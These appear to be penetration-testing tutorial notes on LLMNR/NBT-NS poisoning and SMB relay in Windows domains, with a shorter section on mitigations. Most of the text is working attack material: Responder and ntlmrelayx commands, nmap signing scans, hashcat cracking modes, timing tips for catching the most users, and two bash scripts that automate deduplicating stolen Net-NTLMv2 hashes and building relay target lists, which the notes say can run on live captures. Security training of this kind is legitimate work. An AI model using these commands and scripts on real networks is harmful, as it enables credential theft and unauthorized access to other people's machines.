What is LLMNR?
- Link-Local Multicast Name Resolution. Think of it as a fallback to DNS: when a Windows host cannot resolve a name through DNS, it multicasts the query to the local subnet and accepts an answer from whoever replies.
- Because any host on the link can answer, an attacker who replies first gets the victim to authenticate to them. In the process the victim hands over its NTLMv2 challenge-response (a "Net-NTLMv2 hash"), which can be cracked offline or relayed.
- Its predecessor is NBT-NS (NetBIOS Name Service), which does the same thing over broadcast and is still on by default alongside LLMNR.
responder.py -I tun0 -rdw
- -I is the interface to listen on (tun0 here, eth0 on a lab box); -r, -d and -w switch on extra poisoners and servers (-w is the rogue WPAD proxy). Check `responder -h` for your version, since the meaning of some short flags has changed between releases.
- Run it first thing in the morning or after lunch, when the network is busiest, to catch the most user activity.
- It captures a Net-NTLMv2 response whenever a user mistypes a hostname or share (e.g. \\fileshare01 instead of \\fileshare1), DNS fails, and the client falls back to LLMNR/NBT-NS and takes the attacker's reply.
- Captured responses go into hashcat (mode 5600 for Net-NTLMv2).
In the usual SMB case the user types nothing at the attacker's box: the client authenticates to the spoofed host automatically with the logged-on user's credentials, so the Net-NTLMv2 response arrives with no prompt or user interaction.
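The capture-then-crack workflow above, as an added example that is not from the original notes: it gathers the Net-NTLMv2 lines Responder writes under its logs/ directory, keeps one per account (Responder logs the same user again on every re-authentication), and hands the file to hashcat mode 5600. The log file naming it expects (logs/<PROTO>-NTLMv2-SSP-<client-ip>.txt) is Responder's default layout; the sample log contents are constructed, and RESPONDER_LOGS and the rockyou path are assumptions to adjust.

```bash
#!/usr/bin/env bash
# Added example, not from the original notes: collect the Net-NTLMv2
# challenge-responses that Responder logs, keep one per DOMAIN\user
# (Responder writes a fresh line every time the same client re-authenticates),
# and hand the result to hashcat. The log layout assumed here is Responder's
# default, logs/<PROTO>-NTLMv2-SSP-<client-ip>.txt; adjust RESPONDER_LOGS if
# your install differs.
set -euo pipefail

# One Net-NTLMv2 line per user from every *-NTLMv2-SSP-*.txt under a log dir.
# Each line is user::DOMAIN:server_challenge:nt_proof:blob, so with ':' as
# the separator $1 is the user and $3 the domain.
collect_netntlmv2() {
    local logdir="$1"
    cat "$logdir"/*-NTLMv2-SSP-*.txt |
        awk -F':' 'NF >= 6 && !seen[tolower($1 ":" $3)]++'
}

# DOMAIN\user for every distinct account captured.
list_users() {
    collect_netntlmv2 "$1" | awk -F':' '{ print $3 "\\" $1 }'
}

# Constructed sample logs standing in for a real Responder session. The
# hex values are made up and the blobs are shortened; real ones are longer.
make_sample_logs() {
    local d
    d="$(mktemp -d)"
    cat > "$d/SMB-NTLMv2-SSP-192.168.1.10.txt" <<'EOF'
fcastle::MARVEL:1122334455667788:0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1:0101000000000000c0653150de09b200
fcastle::MARVEL:8877665544332211:0bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1:0101000000000000d0653150de09b200
EOF
    cat > "$d/HTTP-NTLMv2-SSP-192.168.1.11.txt" <<'EOF'
pparker::MARVEL:0102030405060708:0ccccccccccccccccccccccccccccccc1:0101000000000000e0653150de09b200
EOF
    echo "$d"
}

# Demo run on the constructed logs. Point RESPONDER_LOGS at the real
# directory (e.g. /usr/share/responder/logs) to use it on a live capture.
RESPONDER_LOGS="${RESPONDER_LOGS:-$(make_sample_logs)}"
hashfile="$RESPONDER_LOGS/netntlmv2.txt"
collect_netntlmv2 "$RESPONDER_LOGS" > "$hashfile"
echo "accounts captured:"; list_users "$RESPONDER_LOGS"
# Net-NTLMv2 is hashcat mode 5600. Only run it if hashcat and a wordlist exist.
wordlist=/usr/share/wordlists/rockyou.txt
if command -v hashcat >/dev/null 2>&1 && [ -r "$wordlist" ]; then
    hashcat -m 5600 "$hashfile" "$wordlist"
else
    echo "hashcat or wordlist missing; would run: hashcat -m 5600 $hashfile $wordlist"
fi
```

Deduplicating per account matters more than it looks: a busy morning capture easily produces hundreds of lines for a handful of users, and each extra line is wasted cracking time since every challenge-response for the same password takes the same work to break.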
To mitigate LLMNR poisoning, disable LLMNR and NBT-NS.
To disable LLMNR: in the Group Policy editor, set "Turn off multicast name resolution" to Enabled under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client (registry equivalent: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, EnableMulticast = 0).
To disable NBT-NS: Network Connections > network adapter properties > Internet Protocol Version 4 (TCP/IPv4) > Properties > Advanced > WINS tab > select "Disable NetBIOS over TCP/IP". This is a per-adapter setting, so in a real environment push it through DHCP or a startup script rather than clicking through each host.
What if a company cannot disable LLMNR/NBT-NS?
- 1. Enable network access control, so a rogue box cannot plug into the user VLAN and answer the queries in the first place.
- 2. Require strong user passwords (longer than 14 characters, not dictionary words). The captured Net-NTLMv2 response still has to be cracked offline, and a long password makes that impractical. This does nothing against relaying, though; for that, require SMB signing.
Instead of cracking the hashes we capture with Responder, we can relay them to specific machines and potentially gain access (SMB relay).
Requirements:
- SMB signing must be disabled, or enabled but not required, on the target. Domain controllers require signing by default, so workstations and member servers are the usual targets.
- The relayed user's credentials must be a local admin on the target machine for anything useful to happen (dumping the SAM, running commands).
1. Lab setup only: on the Windows victims, go to File Explorer > Network and enable network discovery and file sharing when prompted, so port 445 is reachable.
2. Then follow the steps below:
- 1. Discover which hosts have SMB signing disabled or not required.
- Nmap (use the smb2-security-mode script):
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24
- Hosts reporting "Message signing enabled but not required" are relay targets; "Message signing enabled and required" means skip that host.
- There are also GitHub scripts that do the same check.
Create a text file (target.txt) that contains the victim machines' IPs, one per line.
Edit the Responder config file (Responder.conf):
turn SMB and HTTP off, so Responder only poisons and does not answer the authentication itself; ntlmrelayx will.
Run Responder:
responder -I eth0 -rdwv
- Start the relay:
ntlmrelayx.py -tf target.txt -smb2support
- You need two Windows machines for this attack to work: an authentication cannot be relayed back to the machine it came from (fixed in MS08-068), and the account that authenticates must be a local admin on the other machine, the one listed in target.txt.
- Trigger the authentication: on the first machine, type the attacker's IP into the File Explorer address bar (\\<attacker IP>). The client tries to authenticate to the attacker, and ntlmrelayx forwards that authentication to the target.
Now you have hashes: by default ntlmrelayx dumps the target's local SAM (local account NTLM hashes) when the relayed user is an admin there. Those can be used with pass-the-hash or cracked with hashcat mode 1000 (NTLM).
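The glue between the relay steps above, as an added example that is not from the original notes: it builds target.txt from saved nmap smb2-security-mode output (only hosts that do not require signing are kept), flips Responder's own SMB and HTTP servers to Off so the victim's authentication reaches ntlmrelayx rather than Responder, and prints the commands to run next. The nmap output and the Responder.conf excerpt are constructed; the real config path (/usr/share/responder/Responder.conf on most installs) is an assumption.

```bash
#!/usr/bin/env bash
# Added example, not from the original notes: the glue around the relay
# steps. It builds target.txt from saved nmap smb2-security-mode output
# (only hosts that do not *require* signing are relay candidates), switches
# Responder's own SMB and HTTP servers off so the victim's authentication
# reaches ntlmrelayx instead of Responder, and prints the commands to run
# next. The nmap output and Responder.conf below are constructed; the real
# config normally lives at /usr/share/responder/Responder.conf.
set -euo pipefail

# Parse normal (non-grepable) nmap output and print the IP of every host
# whose smb2-security-mode result is anything other than
# "Message signing enabled and required".
relay_targets() {
    awk '
        /^Nmap scan report for/ {
            ip = $NF; gsub(/[()]/, "", ip)    # "name (1.2.3.4)" or bare "1.2.3.4"
        }
        /Message signing/ && $0 !~ /enabled and required/ { print ip }
    ' "$1"
}

# Flip SMB and HTTP to Off in Responder.conf (in place, via a temp copy).
disable_responder_servers() {
    local conf="$1"
    sed -e 's/^SMB = On$/SMB = Off/' -e 's/^HTTP = On$/HTTP = Off/' "$conf" > "$conf.tmp" &&
        mv "$conf.tmp" "$conf"
}

# Report the SMB and HTTP server switches, e.g. "SMB=Off HTTP=Off ".
server_state() {
    awk -F' = ' '$1 == "SMB" || $1 == "HTTP" { printf "%s=%s ", $1, $2 }' "$1"
}

# Constructed scan: a DC that requires signing and a workstation that does not.
make_sample_scan() {
    local f; f="$(mktemp)"
    cat > "$f" <<'EOF'
Nmap scan report for 192.168.1.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for workstation01 (192.168.1.20)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
EOF
    echo "$f"
}

# Constructed excerpt of Responder.conf's [Responder Core] section.
make_sample_conf() {
    local f; f="$(mktemp)"
    printf '%s\n' '[Responder Core]' '' '; Servers to start' \
        'SQL = On' 'SMB = On' 'RDP = On' 'HTTP = On' 'HTTPS = On' > "$f"
    echo "$f"
}

# Demo run on the constructed data.
work="$(mktemp -d)"
scan="$(make_sample_scan)"
relay_targets "$scan" > "$work/target.txt"
conf="$(make_sample_conf)"
disable_responder_servers "$conf"
echo "relay targets:"; cat "$work/target.txt"
echo "Responder servers: $(server_state "$conf")"
cat <<'EOF'
Next, in two terminals on the attack box:
  responder -I eth0 -rdwv                 # poison only; SMB/HTTP are Off
  ntlmrelayx.py -tf target.txt -smb2support
then trigger an authentication from a second Windows host that is NOT in
target.txt, e.g. by typing \\<attacker-ip> into its Explorer address bar.
EOF
```

Filtering on "enabled and required" rather than on the exact "not required" wording keeps the list correct across nmap versions, and it automatically drops domain controllers, which is where a relay would otherwise fail with a signing error.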